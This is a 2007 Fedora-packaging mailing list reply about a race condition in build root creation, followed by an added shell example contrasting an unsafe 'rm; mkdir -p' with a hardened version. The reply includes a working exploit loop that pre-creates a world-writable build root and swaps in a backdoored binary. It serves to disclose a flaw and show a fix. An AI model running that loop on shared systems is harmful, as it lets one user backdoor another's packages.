[Fedora-packaging] Re: buildroot race condition

Enrico Scholz enrico.scholz at informatik.tu-chemnitz.de
Tue Mar 13 08:05:05 UTC 2007


"Tom 'spot' Callaway" <tcallawa at redhat.com> writes:

>> Someone could pre-make the build root in between the rm and mkdir
>> calls.
>
> Erm, ok. In the buildsystem, this should never happen (hooray mock), but
> when building on a multi-user system, I can see the remote possibility.
> However, we're talking about someone performing an operation in a very
> tiny gap.

No; should be trivial to exploit with:

$ create-big-load &
$ d=/var/tmp/foo-package-root-512
$ while test ! -e "$d"/bin/prog; do rm -rf "$d"; mkdir -m0777 -p "$d"/bin; done; \
    rm -f "$d/bin/prog"; cp -a my-backdoored-prog "$d/bin/prog"

  [ the while-loop should be implemented in C ]



Enrico
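
Added example, not part of the original message: the "rm; mkdir -p" sequence discussed above next to a variant that refuses a build root it did not create itself. The function names, the race_hook test seam and the path are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# race_hook is a constructed test seam: it runs in the gap between rm and
# mkdir to stand in for another local user. The default does nothing.
race_hook() { :; }

# Pattern under discussion: "mkdir -p" succeeds when the path already exists,
# so a directory that appeared in the gap is silently adopted.
unsafe_buildroot() {
    rm -rf -- "$1"
    race_hook "$1"
    mkdir -p -- "$1"
}

# Hardened: plain mkdir fails with EEXIST if anything is already there, so
# the build stops instead of installing into a tree someone else controls.
safe_buildroot() {
    rm -rf -- "$1"
    race_hook "$1"
    mkdir -m 0700 -- "$1" 2>/dev/null || {
        echo "buildroot $1 appeared during setup; aborting" >&2
        return 1
    }
    # Defence in depth: must be owned by us, not group/other writable.
    [ -n "$(find "$1" -prune -user "$(id -u)" ! -perm -020 ! -perm -002 -print)" ]
}

# Runs both variants with the gap simulated; prints what each one did.
demo() {
    base=$(mktemp -d) || return 1
    d=$base/foo-package-root            # constructed path
    race_hook() { mkdir -m 0777 "$1"; } # simulate the pre-made directory
    unsafe_buildroot "$d" && echo "unsafe: accepted mode $(ls -ld "$d" | cut -c1-10)"
    safe_buildroot "$d" 2>/dev/null && echo "safe: accepted" || echo "safe: refused"
    race_hook() { :; }
    safe_buildroot "$d" && echo "safe, no race: created $(ls -ld "$d" | cut -c1-10)"
    rm -rf -- "$base"
}

demo
```

Creating the build root with mktemp -d under a directory only the builder can write to avoids the predictable name altogether.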